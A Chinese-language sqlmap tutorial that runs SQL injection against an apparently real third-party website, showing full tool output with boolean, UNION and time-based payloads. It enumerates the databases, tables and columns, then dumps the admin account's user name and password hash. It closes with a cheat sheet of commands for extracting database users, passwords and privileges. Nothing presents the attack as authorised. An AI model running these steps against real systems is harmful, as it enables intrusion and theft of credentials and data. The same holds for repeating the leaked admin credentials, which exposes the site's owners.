sqlmap 使用方法及实例

注：标黄处为输入内容     批注为得到的信息

1.-u url --dbs 爆数据库

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs

 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

 consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

 

[*] starting at 15:23:20

 

[15:23:21] [INFO] resuming back-end DBMS 'mysql'

[15:23:21] [INFO] testing connection to the target url

[15:23:22] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1826 AND 8515=8515

 

    Type: UNION query

    Title: MySQL UNION query (NULL) - 11 columns

    Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

 

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=1826 AND SLEEP(5)

---

[15:23:22] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:23:22] [INFO] fetching database names

[15:23:22] [INFO] the SQL query used returns 5 entries

[15:23:22] [INFO] resumed: "information_schema"

[15:23:22] [INFO] resumed: "gold"

[15:23:22] [INFO] resumed: "mysql"

[15:23:22] [INFO] resumed: "performance_schema"

[15:23:22] [INFO] resumed: "test"

available databases [5]:

[*] gold

[*] information_schema

[*] mysql

[*] performance_schema

[*] test

 

[15:23:23] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

 

[*] shutting down at 15:23:23

2. -u url --tables -D 数据库 //爆表段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --tables -D gold

 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

 consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

 

[*] starting at 15:52:54

 

[15:52:54] [INFO] resuming back-end DBMS 'mysql'

[15:52:55] [INFO] testing connection to the target url

[15:52:56] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1826 AND 8515=8515

 

    Type: UNION query

    Title: MySQL UNION query (NULL) - 11 columns

    Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

 

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=1826 AND SLEEP(5)

---

[15:52:56] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:52:56] [INFO] fetching tables for database: 'gold'

[15:52:58] [INFO] the SQL query used returns 5 entries

[15:52:59] [INFO] retrieved: "admin"

[15:53:00] [INFO] retrieved: "article"

[15:53:01] [INFO] retrieved: "class"

[15:53:02] [INFO] retrieved: "content"

[15:53:03] [INFO] retrieved: "djjl"

Database: gold

[5 tables]

+---------+

| admin   |

| article |

| class   |

| content |

| djjl    |

+---------+

 

[15:53:04] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

 

[*] shutting down at 15:53:04

3. -u url --columns -T 表段 -D 数据库 //爆字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --columns -T admin -D gold

 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

 consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

 

[*] starting at 15:58:10

 

[15:58:10] [INFO] resuming back-end DBMS 'mysql'

[15:58:10] [INFO] testing connection to the target url

[15:58:12] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1826 AND 8515=8515

 

    Type: UNION query

    Title: MySQL UNION query (NULL) - 11 columns

    Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

 

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=1826 AND SLEEP(5)

---

[15:58:12] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:58:12] [INFO] fetching columns for table 'admin' in database 'gold'

[15:58:13] [INFO] the SQL query used returns 3 entries

[15:58:14] [INFO] retrieved: "id","int(2)"

[15:58:15] [INFO] retrieved: "user","char(12)"

[15:58:16] [INFO] retrieved: "password","char(36)"

Database: gold

Table: admin

[3 columns]

+----------+----------+

| Column   | Type     |

+----------+----------+

| id       | int(2)   |

| password | char(36) |

| user     | char(12) |

+----------+----------+

 

[15:58:17] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

 

[*] shutting down at 15:58:17

4.-u url --dump -C 字段 -T 表段 -D 数据库 //猜解

(1) 猜解password字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C password -T admin -D gold

 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

 consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

 

[*] starting at 16:02:05

 

[16:02:05] [INFO] resuming back-end DBMS 'mysql'

[16:02:05] [INFO] testing connection to the target url

[16:02:06] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1826 AND 8515=8515

 

    Type: UNION query

    Title: MySQL UNION query (NULL) - 11 columns

    Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

 

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=1826 AND SLEEP(5)

---

[16:02:06] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:02:06] [INFO] fetching entries of column(s) 'password' for table 'admin' in

database 'gold'

[16:02:08] [INFO] the SQL query used returns 1 entries

[16:02:09] [INFO] retrieved: "ecoDz4IPZGYNs"

[16:02:09] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+---------------+

| password      |

+---------------+

| ecoDz4IPZGYNs |

+---------------+

 

[16:02:09] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:02:09] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

 

[*] shutting down at 16:02:09

(2) 猜解id字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C id -T admin -D gold

 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

 consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

 

[*] starting at 16:10:22

 

[16:10:22] [INFO] resuming back-end DBMS 'mysql'

[16:10:22] [INFO] testing connection to the target url

[16:10:23] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1826 AND 8515=8515

 

    Type: UNION query

    Title: MySQL UNION query (NULL) - 11 columns

    Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

 

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=1826 AND SLEEP(5)

---

[16:10:23] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:23] [INFO] fetching entries of column(s) 'id' for table 'admin' in databa

se 'gold'

[16:10:24] [INFO] the SQL query used returns 1 entries

[16:10:25] [INFO] retrieved: "1"

[16:10:25] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+----+

| id |

+----+

| 1  |

+----+

 

[16:10:25] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:25] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

 

[*] shutting down at 16:10:25

(3) 猜解user字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C user -T admin -D gold

 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

 consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

 

[*] starting at 16:10:48

 

[16:10:48] [INFO] resuming back-end DBMS 'mysql'

[16:10:48] [INFO] testing connection to the target url

[16:10:49] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1826 AND 8515=8515

 

    Type: UNION query

    Title: MySQL UNION query (NULL) - 11 columns

    Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

 

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=1826 AND SLEEP(5)

---

[16:10:49] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:49] [INFO] fetching entries of column(s) 'user' for table 'admin' in data

base 'gold'

[16:10:49] [INFO] the SQL query used returns 1 entries

[16:10:50] [INFO] retrieved: "ssb"

[16:10:51] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+------+

| user |

+------+

| ssb  |

+------+

 

[16:10:51] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:51] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

 

[*] shutting down at 16:10:51

 

[root@Hacker~]# Sqlmap

 

5.sqlmap工具的使用命令

mssql access 直接爆表.然后你懂的

BT5里面的话前面就要加python

sqlmap.py -u url --dbs //爆数据库

sqlmap.py -u url --current-db //爆当前库

sqlmap.py -u url --current-user //爆当前用户

sqlmap.py -u url --users   查看用户权限

sqlmap.py -u url --tables -D 数据库 //爆表段

sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段

sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解

sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url  判断

sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba

sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户

sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码

sqlmap.py -u url --privileges -v 0 这是判断当前的权限

sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来

sqlmap.py -u url --tables -D '表' 爆表

sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列

sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内

sqlmap.py -u url --dump -all -v 0